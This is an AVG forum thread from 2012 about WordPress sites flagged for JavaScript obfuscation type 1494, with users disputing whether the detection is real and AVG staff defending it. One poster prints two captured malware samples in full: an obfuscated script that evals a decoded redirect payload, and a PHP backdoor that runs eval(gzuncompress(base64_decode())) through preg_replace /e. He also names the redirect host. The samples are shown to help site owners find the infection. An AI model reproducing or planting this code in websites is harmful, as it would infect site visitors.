Folder AVG Forums » Other topics » Virus Removal, Tools for Removing » Exploit Javascript Obfuscation Type 1494
June 1, 2012 18:14 Re: Exploit Javascript Obfuscation Type 1494 #205795
Reply with Quote | Quick Reply | Top
vulcanmedia

Avatar

Novice
Join Date: 1.6.2012
Posts: 1
Exploit javascript Obfucation on various sites..

Hi AVG

I am a web developer and I am seeing these warnings across many of my client sites.

Exploit javascript obfuscation 1494

Here are just a few of the one's (all WordPress)

vulcanmedia.co.za/ava
boxliving.co.za
perfectpartners.org.za
tracyrobertson.co.za
skipperscourses.co.za
imbasasafari.com

These are hosted with 3 different hosting companies, so I doubt that all of these could have been "infected". I've looked through these and didn't find any malicious scripts or viruses. I've run scans on various sites, all which reported that these sites are not infected.

Can you please let me know where AVG picks up malicious code as this is causing a very negative effect on my business.

ScreenShot008.png
June 1, 2012 18:23 Re: Exploit Javascript Obfuscation Type 1494 #205801
Reply with Quote | Quick Reply | Top
BIG AL 43

Avatar

Moderator
Join Date: 18.6.2009
Posts: 23756
@ vulcanmedia

Please note this has now been covered in Weekly Overview: 23/2012. Subscribe to this RSS feed if you want to be notified about new Weekly Overviews.

Also for your info..

Your posting will no doubt be monitored by the relevant AVG Team. This Announcement post AVG's Community Team Availability is situated in the 'Information' forum area. Please bear in mind that it's now Friday evening [time 20:23] & also the weekend in Brno, Czech Rep.. Weekends are not classified as workdays.


AVG Forums Volunteer ModeratorAVG Forum member since - Nov. 27, 2004My total posts on the Old AVG Free Forum - 27,063
Alan
How-To Articles | FAQ | Free Support
June 1, 2012 18:42 Re: Exploit Javascript Obfuscation Type 1494 #205805
Reply with Quote | Quick Reply | Top
malwareremovalservice

Avatar

Novice
Join Date: 1.6.2012
Posts: 3
JS type 1494..

Seeing a rash of sites come in through google webmaster tools and on some of the security forums that contain the following:

<script type='text/javascript'>
st="bno3nt-en0oen0apno3rxrpno3rxen0d";

Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~%8?%6&"]);

var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:&&$?$]^<^]^]&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@!?^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+*+&:&]&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+&*$?&^$_&!&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*^]&!^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$@$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^!+$_!$&*!|&)&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$@$$$~!+&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_$?$:!@!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$$|&&^]&+&~&^!*&]&*&_!+$)&:^]!!&:&_&+&~!!$)&!^]!+&?&:!^^@!+!$!:!@!&*!^]$$&!&*!+!^&*!++<!+!+!$&:!^&+&&$$^@!&&<!$$|&<^]*@*]^@&+!)!)$?&*^]$$^|$$$:^@&<$_!|!*!^&?$?$$&?&*&:&!&?!+$$$)$$!^!*&$!^!+!$&:&_&!$$$)$$!+!$&*&^!$&*&<!+&*+*&)&*&]&*&_!+&!&*!+$$$)$$!!&:&+!+&?$$$)$|$$!&&$&]&:&&!$!^&*!+$$$)!&*!$)$$&$&~&+!:$$$)$$&<!|!|&*&_&++^&?&:&)&+$$$)&*$)&&$)$$!^!$&^$$$:^@!&&<!$$|&#^]&<*@^$*]*@&<*@^<*]*]$?^^$)^<^&$:^@!&+@^]&<*@^+*]*@&<*@^<*]*]$?^^$)^&$:$@$$&<&]&*$$^@!|^]&<*@^**]*@&<*@^<*]*]$?^^$)^<^<$:$@$$&$!*!+&*$$^@!&&<!$$|&@^]&!$_&$$?$:$)&$^]&<*@^:*]*@&#*]$?!&+@$:^@&$*@&<*@^<^|*]*]^]&@^@&$*@&<*@^^*]*]^]&<*@^?*]^@&$*@&<*@^|*]*]^]&<*@^?*]^@&<*@^:*]*@&<*@^&*]*]*@&<*@^!*]*]$?&$$:!]&^&<!+&^&?$?&]$:!@&&$_!!!$&:!+&*$?$$^)&?!+&]&)^_^)&$&~&+!:^_^)$~&$&~&+!:^_^)$~&?!+&]&)^_$$$:$)&:$_!^&*!+*+&:&]&*&~!*!+$?&&!*&_&^!+&:&~&_$?$:!@&!$_&<$?$:!]$)^$^^^^$:!]!]!]^@!&&<!$$|&)^]&_&*!!$|&?^@&:&&$?!!&:&_&+&~!!$_&_&<!&&:&!&<!+&~!$$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&]&<!+&^&?$?$~&&&:!$&*&&&~!?!)&]!^&:&*$~&:$:$:!@&)$_&<$?$:^@!]$|&*&)!^&*$|!@$|&+&~&^!*&]&*&_!+$_&~&_&]&~!*!^&*&]&~!&&*^]&&!*&_&^!+&:&~&_$?$:!@&)$_&<$?$:^@&+&~&^!*&]&*&_!+$_&~&_&]&~!*!^&*&]&~!&&*^]&_!*&)&)!]!]!]^@";

function e(){

e=a.join("$").split("%");

for(var d in e)"string"==typeof e[d]&&(c=c.split(e[d].substr(1)).join(e[d].substr(0,1)));
return this

}

var f=e(),a="";

for(_E=~b-~b;_E<c.length/2;_E++)a+="%"+c.substr(2*_E,2);

window.eval(f.decodeURIComponent(a));
</script>

This has been going on since yesterday - after some research it seems it set's a cookie and only displays it once, and has a redirect to bent-goga.r.gd/top2.html

EDIT 1.. Forgot to mention, these are all wordpress sites - assumed to be running the latest version.

I think the reason it's so difficult to detect is that once it set's the cookie, you won't see it again so it makes it hard to track down. I haven't gotten my hands on an infected site yet to clean out but when I do and I can locate the code, I will post more.
CJ Chamberland
Malware Removal Specialist
EDIT 2.. ---- signature commercial link removed ---- Not allowed on this forum. Please remove from your signature.
June 1, 2012 20:42 Re: Exploit Javascript Obfuscation Type 1494 #205819
Reply with Quote | Quick Reply | Top
Egaladeist

Avatar

Novice
Join Date: 30.5.2012
Posts: 57
There's two problems with the theory of ' one IP '. Assuming that the first visit by a IP picks up the problem then is clear of it from that point forward. And the site then ' appears to be clean '.

First problem...then those of us on a static IP should only see it once. I've seen it on three different occasions and on multiple occasions on other sites like productforums.google.com...with the same IP.

Second problem...assuming that this ' one IP ' is accurate...all these other scanners and web safety sites should have picked it up on the first scan...even if they didn't on later scans...and why didn't Microsoft Safety Scanner or AVG pick it up on a computer scan of a downloaded folder.

I also find it very hard to believe that this issue has somehow managed to fool everyone, including firewalls, but AVG LinkScanner. That no other anti-virus company is pushing up warnings.

If I was a suspicious person I might suspect the reason why AVG picked up on this so fast and is ahead of everyone else is because you somehow caused it with your AVG users, infecting us in the update, or probably to scare people to buy your security package which so conveniently and prominently is displayed alongside the warning.

Are any of these conversations happening over at COMODO, or Kaspersky, or Avast, or Symantec? A Google only turns up AVG results.

I keep hearing that this is a Wordpress problem, but then we'd be hearing from other sources, including and especially Wordpress who would be frantic right now trying to get out a security update,, it seems like it's specific to AVG and AVG users.

I don't see anything on Wordpress or Wordpress forums about this. And that would be highly unusual because if it was a Wordpress specific problem then it'd be booming over there.
June 2, 2012 04:16 Re: Exploit Javascript Obfuscation Type 1494 #205841
Reply with Quote | Quick Reply | Top
malwareremovalservice

Avatar

Novice
Join Date: 1.6.2012
Posts: 3
So after further investigation - this is how it starts out, in random files:

$lqxizr = array("eNqtWgl32siy/iuMT05sXjyOWg","ugccjFjsHGsWDAgIGZHA4I2SzC","cFjCkuS/v+6q6tYCduZObhKQ1K","r+urq2riqSGD4mTn57XD27y+H0","ueNthovl4uR4qx0nk4lvCfkisd","VO3gyT3950sxfzeXd7cnycODuu","Pdjikuo+bBYtcXef0e5G4ubiSX","x/vhbfpa+95uWgf+0PxVPvup4u","5lkNyOv1p/IncWeuy9tLcdPsPl","jiOu4Z/Z24KeatevGqtXLEw6dx","9vj02NUL4mHSbtjLnl71+VDPEC","OXfs+3YZVWs+S3r31xu+WvuzdV","cau5V+Iy/XonLmvxlRWA/F9xK5","4yI357t5aD4h8fRWoYDN1WHkqj","dhOY1u7qm0Fv0meth75fHnI2ho","yJF+52/dR+MNNuTVvfjeow+aoC","PACEDvJb9WA7jRGX0dceyG/6BF","S6+Np8BSi4r5c+PWmf+VTYSGVa","Auk9AUOf8PKnGLm+ha0XQWiws3","e4nzttIx4BsqUXNHHtPtir5tX0","K20XVHNtj1rN6qynmynQAihVCe","yqghdiAlZ5UlLjT7dDxygNWyOn","lt/cgkYcUGsZ1A62MiqrxdxJcZ","eHreKcC8bnA598/gTWB1vIbxzY","TGtUqj2J1WrXIEBgFYxLsHt6XG","0AD/ewACsKSq4rF5Q3KmqwcGO9","egDQ1hIYa7Ce80mzmnxcPD/sLp","blBohnLqbvQKDu3SivNT9ZPede","A4NpAtQCFHtX8/tiGsKJb4ZL+g","swNf5eXPqf0X5Ku6qLzpIHqJLg","SNzsQM5i9TksJbi6X+AmGnxKA8","wF/AEkq7FmMJWmiYfoVHgtVmzj","RvyA6c9MyCJYFVbqi71anCmw0E","AksGJoBXhWq4BEb13lNSNnzfcA","qglIl2J1KRIpDmc3gGElJWRqic","riTAlpC3GAsQkYcQOrOjUwT64Y","c+OAQTVI1+0IJISkdRasmE8rA2","kJmR3lDcdfr9AmhZiK21Lg6w7p","ia8AZupcXZI5wMpMKQQC03rljP","ImeUJpV0BSYAisXAfkhiQt7oDx","XQVWArILCwUMq8l7sBJnB3sJST","i/VqtX1N5gZdBhcVNigQ6dGvhe","SCmgOzkN9XdJIhlvBGNgzrRfHC","8yskV8hHAN5sXJdSFFZ1TZooWT","lEB6lkOM8NcgBtg2Tg8Jeaf8io","RduhL6yDNOvisHMcipjVlTxTfT","woWLVmhsqwwft8VD8FosWobA5Y","OFOxjKUO55U8q6XCBjuBoQ/2OL","5MplKHjZAPIoLJhbIe81kZWv/P","DuIR4jjxDQhLVund1FoK22NKed","I80IrNFlKKhKSEgmbAMsjpPVXE","ADmMBoMVo4O5IlCJPbwqpcq+Br","5RRSr5uIDcPiGJbJ7relqzx4zl","VByG6nFmyELcxl6KsgSMO5iBol","CE0otEW2be5KhTVNdTSBDmL3pc","do5QYxM6qDp5RGY2WviBbew45b","2cppLPS72gA2h4Exz0MXw2gA+/","JlNEBRgMfvlIHWfOEZG4ir0YMA","+Byp09BCc2pILa/LJL3gIIB46o","BLoz3j/lQIkMcSE4wHDF/IUByL","CKY4J5yRY6JaIcgDJyB0DMM8/O","ioA2FiPjHn7EJ6sR52LRlb5RQg","V+4iFeAYfJyTP8nzIUIO6A45nS","CDfCSKDJJR5EHkgpC1Cbm7hVtv","HV5J+iwED0bS1KRO0FjkttHbgL","mKLiWl6IJjEdWZJxK5fbl1yLg2","UmJ4BrYOi6BOwpV7eJJHpTTVuB","hwhboRDmGUkES2T/tSDFL8p+lK","8Mjc/qpqH0o0O2lnFIgs9Ckn7A","jwmkFk2e3lIOC8IgCZ6BtMHrL8","KFfRuTSSsR9IiT/MMRxfTgGVBg","nRLeVXFNpqpPF9UhGdwfd5PC2J","CA33kBAgI+GjGxY1ZGDHsCbiV2","VNhmI6T7GDEyKjDEAgOBG5lf0A","M3WIwaWrlkovuQ9TNATSUk3lFl","uHagoQO8h47RTkaQgMkj+blPYW","lfZqSksYPa4gM9PKMmjyfQQ5kK","WEh2TKGMrhqI4upKkVxuE0g580","bRnOmEP7kbYCK6lTcoN7cbaSd1","Sbg2eEOmORAUDJG2SFm3ItT7nb","NnzYR8+IoiHd3HkKHfyV8CGPZ/","FoEE7IkAy0tKYFjfDZVpKZIZ4F","4bScpxVwmJZqIl/Ib0riyN6Nw/","bBNWYSqomo8tgYa9EUlTzmFjON","gqo6V5E0TuQMYtuVkPdg+o2a40","f21WUobhZ3pcBg8fB5YlIl3D7C","yCg89Msg8W1I29iVVA5BkVjmET","XITAI/BIbWIn9Am3FYNCOn5B7q","O5WZl2timms1w6EV/ZSqD3RrPI","sjTKIbPGlBpjVAKTZidQHtJwh0","gFyGPYEFGJJRgCRGI6clHOdWcM","o0wJdVnMQsDIV96Up1OUoULem7","QQaGKRaor1aQlePWaYQRHeXTpZ","qTDafUlNeD6XGXCaoONzhNoBjZ","OiMVpnaCvCSzRDxohLpKEdtpoZ","eB4zGllpqw0IqmcobQQjXMNUuj","cDZb2cnKwMGDA0UtSdVJvY4k44","L8IqLk7k1Vc6NDbd3+2sa+hw+9","HrhlwNAzKEpQ9QC4tGpNbBHGWt","AkwFvjdtDX11L8LjaGoDvQhnZU","Q1QF7sQe9gylpO6N+K6CAFxsWi","26D41V/wLcsWU0tj1cG/pP1wMR","crsP1tgDe79cYBsFil9IPVrA36","2Il33Ygb1t30CpsG03eZWFy4Iy","9AGGrgk2Zvo30NDqG33DNaooyc","Db3RtQg9YFJu2VoGzCkoueaLCd","ouPTRntB7i3eCkxxe+OvvKjQ+7","D//qylNxbtpgqh7gRsd9mabDgT","Kjp5DzC8al83RJUL3ntz6/cmFY","UH+vC3/aYjRdx7KCz6emHbjhap","KJ2+T5J+LDR20KBoUhNhDEs9t7","EriBZ6NeuppPHGeWqC7dkZ0EEl","GkROj5v+cnDXnF2C+TdmfW9XXz","wGkfYO21Z30EkxxW193Kg26o1a","o2CrHL0+hgq1DRq2RJPwvlCFdl","69YBdrrFQXjTejbtOuGnh6Vvgj","3jZK9aBybeQhdlaqef9eNRqpf+","ZG2mhoi/66XVHpQ191J3tkA70b","VUIDS+NGqQYLgPUUmlohXy1APi","GYBpKC3ahrDRWrQZIaSPqmWgdJ","1yWaVrpXdI3LelMD9dzW8o1ypc","4KQaMU2XvABJ91kU0gfqiK1iK3","rbHqoAatV7l80Jdpo28PWiQRo7","olqfSvGysgaCnafP+hXwm5R1Xr","Bo5aDmz2LuiT3m0tsKNe8wIfQa","kaPUZlzGkhmrUeIKxPSRH316rp","gQ7BxvLIurpYO7i6uIUh6jDUeM","53Edk4DAWqxVD8tI6VzI4YQqp+","IKVIjxNEXiQKiFiVcEsYcrdgaW","k4IIQbMJy+AcHpsXvdgGjUDoRI","QcpvgacuHznpI7gaJ22DzdiLnm","pWF8bHyfO5t1zNnxO97sJLmZ2+","50773smb7l9vhl+S5z8SPxLDxw","O/ObgDzx131rPOwOv2O/602z9O","Jr+pXyD2X58kvx0GcqMT3ZM323","JHS34TF5bdaida8pzP3J+4mvud","4fNwKeYLYj2rhk6S53C/8JbT2R","IQ9dNP9epd+c9ah19OcY1XiG7y","F1f56ul8unrucw5eI60VnXy5Xp","O079JnVvjz6txqvlavlmrVi9J9","IVjunXamW7GvV2Hq9/nqxXW+VI","ONMRDYbyc5LorOk7c84UJkyeT3","7+EBPcn/fMu9jFko392VH+7Kny","5qxXIpxJoR+fPzAc75j1fWcS6a","1fxVsXofWiIV/pP++QBfQoAaaA","HexkMr0klmrj9deHKEiwZoE79l","s4nHrr/wkt/IB2D8/McPjw8mDt","nc42Lqjqcz71nY3JM/7XV9mGTC","8lp2sZx35t7M77qekLGRPOXfZl","KaG4eczb2nzqS7dAeCwEqeHsG7","I7JhKwuPBJfzNjNfuCMnTSkUfA","fff0n7/HKOs8MMAIVgII1TLTQL","uE18/57AGy4ETpJR6/MHmytMPK","Sy3FYG08Wyt33uTgiQvxPi+fYK","gQJiGiGls0pyQJRSus5oyFwGvm","01br0TFs+343Unwm46y+HEm67Q","eNIxMlJpmoKGlj26ztdofze12p","/v2Zn29/zv56NzfJ84yx7dcLb/","AJq9V1Xv0Zt78z8Sg+Vy9sf790","AEaDFKITnGkqGp9YU3//3iyXsm","bHZoBjfCx9mK2xPuBV8mz9eDoe","/xCOlN5XZoP0xMfOSiXsR2n2H2","mf7St3C7x8Dy08Qmi1gVM1D8jC","lQ9o6ROzE9i+9CZkaiNok1PQv2","a37ozRPvP+L338/46gh1z2libs","FM8Atm0dqBUwZLcRcXcc9KfqGV","jBgvnMsvIVPk7wVkim9aYhlSfD","jTCFPTmA7UUZ9kaXJKvgPSQNQT","WSbg+4Av/psI+eWAwzP7H3i8GZ","etroFsdRblkZlCPDo97c+SZmCe","onZlVqCOYxJeKFAyxiMljnruYC","osW+cTeahcihcHD/u+t7yMHPdi","ALVlIQMpUlo624X/uiBQLdxSCi","9pvGTwYsPFwF0bDC86XjD8Gmht","BqIYiGIgioEoBqKYiGIiiokoJg","VxRDERxUQUE1FMRDERxUIUC1Es","RLEQxUIUC1EsRLEQxUIUC1FSiJ","JClBSipBAlhSgpREkhSgpRUoiS","QpQ0oqQRJY0oaURJI0oaUdKIkk","aUNKKkESWDKBlEySBKBlEyiJJB","lAyiZBAlgygZRLERxUYUG1FsRL","ERxUYUG1FsRLERxUYUpml0ZXTV","6WrQlYKLZtE1JaNZJjAppqXpbY","auhM4InRE6I3RG6DJ0MUJnKboS","HiM8RnjkjkwnPJ3wdMLTCY9snJ","GRM7JyRmbOyM4ZGTojS2dk6gyy","LPSjLISzcLglD2CGDLgW0drZ5X","zlnT9O+SnLgx86XqK7AP/mrHMf","5gfh0/DkCAeOpI+Sk9pZyJ/Oe3","z+OAi8djKCmFGILEDEZ8lOKBV7","FTjRfe7/hgCwoZTaUGxidEqChz","ufUg9O+yErQ7V+lrZiX3tI4ZBn","n78Q2OaTzvyx88gP8Eh4C4Zxwz","pVKkZWjE1ETiNfyCNQN7MiTeoP","5/JN8htmBsCPyFrxhZXlwukrOl","Ok8xLD4mSQavA49/ZtIjaWEWPD","RYgvsWt3MJn26TFIBsyU/HADWz","37w+exnMJlAelFiIXzH8vpivSu","66e4V7okX5LdcujNI1ITAwiRwr","mYI3FfQOnZ2cmyM+d6PZGHYTh5","CSUwBh6aeobQgtzhzIx/eKKBcz","A10NOxOeq9ns296fB6q5Gv/gXi","tOksNoyXVlNsfUkmzmbT9YmyP/","ybPI1lPSr74fR7rEdziZ88J78k","ziDl0iTUHnv/Jl8hWZgxWZgiKQ","s5zP5i+pkV/oBE4jtkgunYoKHG","DvCftmJfCtbQaJYdvcpxgxFanP","4n8C9SBwLXJaRx8q9FofNkPvb5","72TDODYLYRsmXfUX3XGxXYgeQW","fpTWYd7tsR14y/PFExx7BEMeg9","f8UMn59HyXBVbZ0fpjP/IZ21R0","dEghNefJ50OoXiXb7TgZMOopUo","4HmEkxtDer6ZUBTjz9Jc+WZUDS","uGZdynU+CwrLxNRDreBqdTEmuk","oSbhWSIU3pzR5VYSgNwO4HnQDs","upFoaBIdCg8o1DjqbDZ5QJ1SHi","HeThhxAXA8/Hjohsk3GIXDAq+X","kFYbvgMgaupr3OYtmdi/ZaDofV","dInMSYR9uNNnrjs+nVPyIX6edV","zf6z6fvLLQrLtYLAfz1d5S8sUv","LJbjx93cW0xXc2qMGJlsbqb6EV","zKIFEbmmIh3VlBXZ5ThbmRUUS8","Ms89inOYXgSNCaaLD/S+ZkEVzq","cGPO1LYD51O9heevv2MMuSQrKN","KW28aM5+TAS5LlUizBItP7QYO7","5NA0x0nyPYG3Cz/4qL41glJ2Hx","2KHYqcc/PBS9IDz7l04kJXndSo","U/QgOqoXdgF6Kt8ksb3GvUxjao","+jY/k0uwA808y7z0DftBO4iZlY","xYg+XEX8w8d9j13UF3TouLIAH9","GFNDlZvUC+D5TvgI57UppjPx8Z","RsOeixF2n5whBtheXUn64pf2Mq","qzUZNRoZL3Op9xgM2XLI1OUYr3","9lvH9e+f45nmuhCo4qY0alMaPa","mFFxzKg6ZlQeM6qPGRXIjCpkRi","UyoxqZUZHM0gYeIb8NFwtvefKm","86lc/lzM/4UilDo2eQa0fyaqPq","tpKrLw+WLKPgy2e00TU4a0GW6u","xl9S+zYXP9NMWbLwqiIXLSv48u","e5yVgm6CbVfWaKE0IQwead9X5+","hHsW3pJ7XM+HSwLAuJhOw3hgb/","x8Pc8FBYMZKhjSEdf82bPAxZIh","xEqsbMgFNYVpvvbSir/ck1ewSP","K/Ugy41w9MsbKHU6wg1drLzzLY","N/1V1R0WuMVY8ldkhDGBH6b97h","LbBWmbyiczExrNaHLUzkoxIhG2","ty1NDS+5H0ReYUllZn7/hQCPES","D9YkGnW7GvvWKLnaXin6Dw0g+U","WhqPubHPa1XIgZNgP6EXpRMcRA","esUsrNYkc8IKK+0omPGBAzTFby","fOwDjenJA4TGAULzEKF1gDAFvw","rG+hZgfTy5PZpPEr/PHxPE7/8d","Ybf9gGHbLxv2XhDCCRBoMj8LNM","EPREwTBdEL38mfGT2lhCLSdXvB","Lt++PbAZngN+/w6ji+HOk0MfQm","YV+W3yJ88y87L0bM51T17udaiz","09Jl5yYDnZvYL/VAEe+g/VO5Wx","rK3d4P/EeIfPSqQvj8/4lCQi85","ZFxbkL6FswEIWhbfY1QWqLpISU","Daoh8lTZSKtFEctKjTF25aWqZs","WvK8R5RqueV8iNUOH+CyxqSGVG","lhH5W6lT+of5gLftw4JXKlUvjd","FRt65IPMFkMCh06mQ/5hay/oyW","R/Px/QlPxhhtmMhzf60cfr4v8I","EC34WCPtXdpS/0JNNU3j63KAow","8Ldz6cLRPL7czLHi+9zfL9qPu1","i6PHH1ErH97j80fxy+ePH5Gs0z","ZeT6py3X6/04U8HHmkbE78MhDn","9VASffpah4/LLvGfj/8PWGX41A","=="); echopreg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x6C\x71\x78\x69\x7A\x72\x29\x29\x29\x29\x3B","."); ?>

Which then get's decoded to my previous post...it's basically encoded, then jsunpacked, with url encoding. It's not a false positive, and it's not a scam on avg's part. Check your files and clean it out.

CJ Chamberland
Malware Removal Specialist

June 2, 2012 04:34 Re: Exploit Javascript Obfuscation Type 1494 #205845
Reply with Quote | Quick Reply | Top
malwareremovalservice

Avatar

Novice
Join Date: 1.6.2012
Posts: 3
Egaladeist wrote
I don't see anything on Wordpress or Wordpress forums about this. And that would be highly unusual because if it was a Wordpress specific problem then it'd be booming over there.

Wordpress exploits are not necessarily towards the core wordpress system, it is fairly secure. Its when people start piling on plugins, and don't have a basic understanding of security/file permissions that the problems start to surface. Like using the default table prefixes, using "admin" because it's the default, weak passwords, etc. Just because you can point and click to install wordpress - it doesn't make you a wordpress nor a security expert.

CJ Chamberland
Malware Removal Specialist
June 2, 2012 06:44 Re: Exploit Javascript Obfuscation Type 1494 #205851
Reply with Quote | Quick Reply | Top
Egaladeist

Avatar

Novice
Join Date: 30.5.2012
Posts: 57
malwareremovalservice wrote
Wordpress exploits are not necessarily towards the core wordpress system, it is fairly secure. Its when people start piling on plugins, and don't have a basic understanding of security/file permissions that the problems start to surface. Like using the default table prefixes, using "admin" because it's the default, weak passwords, etc. Just because you can point and click to install wordpress - it doesn't make you a wordpress nor a security expert.

That in no way addresses my statement that if this was something specific to Wordpress sites then the Wordpress forums would be abuzz. And they are amazingly silent on this issue. So silent it's as if they aren't even aware of it.

Up to this point...

this entire problem seems to revolve specifically around AVG. No one else seems to be aware or even concerned about it.

Even the 1000's of security forums ( one of which I help administrate ) seem to be strangely quiet on this ' outbreak '.

Don't you find that even a little odd?
June 2, 2012 07:28 Re: Exploit Javascript Obfuscation Type 1494 #205855
Reply with Quote | Quick Reply | Top
ondraploteny

Avatar

Administrator
Join Date: 27.3.2009
Posts: 6996
Hello,

Please be informed that this malicious JavaScript Obfuscation (type 1494) is known by AVG LinkScanner since 2nd April 2012 (thanks to AVG Web Threats Researchers). So it is more than worrying that no-one else has yet noticed this particular obfuscation is being used to spread malicious content.

Our database has about 29 thousand hits per day of this detection from our users (who have automatic product feedback providing turned on). So more than 30 thousand AVG LinkScanner users protected from being hit by the malicious content. And that is our job, to protect us (= users).

AVG Web Threat researchers have yet again confirmed that these sites are serving malicious code and that our recommendation is still that the site owners should look for proper, local, professional computer security assistance to fix their sites. As clearly they are unable to even find the malicious code on their own servers, much less work out how it got there and what additional steps they will have to take to properly secure the site beyond simply deleting the code responsible for serving the malicious JavaScript that our superior product will continue to detect on their sites until it is properly removed.



AVG Team
How-To articles | FAQ | Free Support
June 2, 2012 11:32 Re: Exploit Javascript Obfuscation Type 1494 #205875
Reply with Quote | Quick Reply | Top
zonetrap

Avatar

Novice
Join Date: 2.6.2012
Posts: 11
Same issue here.

On Wordpress, getting the same Exploit JS obsfuscation error 1494, but there is no code in the WP theme files. The error pops up, I move from page and then refresh and then the site is fine. Something to do with the IP.

But when the error shows, I still can't see the bad code.

Any ideas here?
June 2, 2012 13:27 Re: Exploit Javascript Obfuscation Type 1494 #205893
Reply with Quote | Quick Reply | Top
Egaladeist

Avatar

Novice
Join Date: 30.5.2012
Posts: 57
ondraploteny wrote
Please be informed that this malicious JavaScript Obfuscation (type 1494) is known by AVG LinkScanner since 2nd April 2012 (thanks to AVG Web Threats Researchers). So it is more than worrying that no-one else has yet noticed this particular obfuscation is being used to spread malicious content.

Yes, it is somewhat odd, as I mentioned earlier. In fact now that I know you've known about this since early April that makes it even more odd.

It is odd that Wordpress seems totally oblivious to this security breach that only affects Wordpress sites, it is odd that no other anti-virus or security software or online support is picking it up, it is odd that all these safe search sites and online scanners other than AVG seem to miss this threat, it is odd that even AVG itself has conflicts in picking up this threat...case in point:

my site has been cleared by AVG ThreatLabs (see previous posts)
a downloaded folder scanned on my computer using AVG failed to pick anything up
you yourself said ondraploteny, in post #205207, and I quote,

ondraploteny wrote
I have re-checked mentioned website with no detection

it is odd that it is explained as being a one time one IP and yet even those on static IP's are getting it multiple times, it is odd that every time I see the 'threat' it seems to point to a different place, or no place, but never a specific place, it is odd that your LinkScanner 'experts' claim to know this threat exists but can't provide any evidence of it's existence,

they claim to know, yet can't identify it, can't tell you where it is, can't tell you how to eradicate it,

all they seem to be able to do is tell everyone to get professional assistance for a problem they've been aware of for two months.

YES! You're right ondraploteny, it is very strange indeed.

And we should all be very worried about this very bizarre situation. Of being informed of a threat, having our visitors warned of a threat, that has been known for 2 months but nothing, seems to be known about it, and nothing has been done about it...

except, that is, to be advised to seek professional assistance to find something that AVG is detecting but can't find themselves.

What is the most strange about this entire fiasco is...

that your LinkScanner 'experts' are detecting this but can't point to any file or folder of where the detection is...

we're just supposed to take their word for it. That it's there, even though they have no clue where.